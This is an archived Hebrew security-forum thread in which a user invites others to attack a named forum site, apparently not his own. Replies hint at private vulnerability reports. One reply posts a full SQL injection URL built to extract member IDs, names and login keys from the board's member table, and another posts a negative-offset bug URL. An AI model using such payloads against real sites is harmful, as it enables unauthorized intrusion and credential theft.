Logo

רד-בורד: ארכיון

ראשי > אבטחת מידע > תנסו לפרוץ

03/03/2007 23:19:05 tweester
שלום רציתי לבקש שתנסו לפרוץ לפורום:
http://bazteam.perffect-x.net/sec/
ואם אתה מצליחים הנה הודיעו לי מה הבאג או לפחות איפה מצאתם אותו!
03/03/2007 23:24:23 tweester
אין עריכה בעע...
טוב רציתי להגיד שכמובן זה לטובת אבטחה ולא להפך!
03/03/2007 23:57:11 Acid-Burn
דבר ראשון של מי האתר שלך..?


עם כן אז תתחדש ודבר שני אני רק יתן לך כמה כיוונים שאני ראיתי שמה..

דבר ראשון אתה לא עדכנתה את גרסת האבטחה האחרונה שיצאה (הגירסה המעודכנת ביותר היא אומנם באנגלית אבל אתה יכול להוציא ממנה את העדכונים...



דבר שני..!
עם כבר אתה החלתתה להשאר עם זה אז דבר איתי בפרטי ואני יעדכן אותך אחד עלל אחד בכמה חורים שראיתי..!
04/03/2007 02:56:47 tweester
תודה acid
עוד מישהו וזה לא שלי אני פשוט עובד על אבטחה לכיף!
04/03/2007 06:38:23 דרקולה4אבאר
חח, כן הפורום מאובטח בצורה דיי טובה :-)
לא יצא לי לבדוק אותו לעומק אלה סתם לנסות כמה באגים, ובכל אחת ואחת היה כתוב את מה שנראה פה:
http://bazteam.perffect-x.net/sec/index.php?&&act=Post&CODE=02&f=2&t=62&qpid=1)%20union%20select%%20201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),name,char(58),member_login_key),1,1,1,1%3Cbr%20/%3E,1,1,1,1,1%20from%20ibf_members%20WHERE%20id=1%20/*[ההודעה נערכה על-ידי דרקולה4אבאר ב-04/03/2007 06:38:54]
04/03/2007 10:31:03 tweester
תודה דרקולה
אם יש מישהו במצא חור באבטחה?
אגב לאבטח את זה היה יחסית קל
04/03/2007 12:45:40 V[i]RuS
http://bazteam.perffect-x.net/sec/index.php?act=SF&f=1&st=-1
לא שתעשה עם זה הרבה,אבל עדיין עדיף להוריד את הבאג.
עמודים: 1